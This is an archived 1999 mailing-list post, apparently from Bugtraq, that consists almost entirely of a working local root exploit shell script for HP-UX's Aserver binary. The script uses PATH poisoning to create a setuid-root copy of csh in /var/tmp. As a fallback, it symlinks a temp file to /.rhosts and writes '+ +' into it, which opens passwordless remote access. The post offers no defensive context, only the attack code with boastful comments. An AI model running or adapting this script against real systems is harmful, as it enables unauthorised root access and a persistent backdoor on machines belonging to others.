|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
aserver.sh
Subject: aserver.sh
From: Loneguard
SECURITYFOCUS.COM
Date: Thu Dec 30 1999 - 10:48:52 CST
- Next message: Chip Salzenberg: "Re: majordomo local exploit"
- Previous message: Paul Schinder: "Re: The "Mac DoS Attack," a Scheme for Blocking Internet Connections"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
#!/bin/sh
#
# HP-UX aserver.sh - Loneguard 18/10/98
# Simple no brainer path poison followed by a twist [ inspired by DC ;) ]
#
cd /var/tmp
cat < _EOF > ps
#!/bin/sh
cp /bin/csh /var/tmp/.foosh
chmod 4755 /var/tmp/.foosh
_EOF
chmod 755 ps
PATH=.:$PATH
/opt/audio/bin/Aserver -f
if [ -e /var/tmp/.foosh ]
# Hmmm, you not like that technique?
cd /tmp
rm last_uuid
ln -s /.rhosts last_uuid
/opt/audio/bin/Aserver -f
echo "+ +" > /.rhosts
# Haha, my Kungfu is the best!
fi
echo Crazy MONKEY!
- Next message: Chip Salzenberg: "Re: majordomo local exploit"
- Previous message: Paul Schinder: "Re: The "Mac DoS Attack," a Scheme for Blocking Internet Connections"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This archive was generated by hypermail 2b27 : Thu Dec 30 1999 - 12:57:37 CST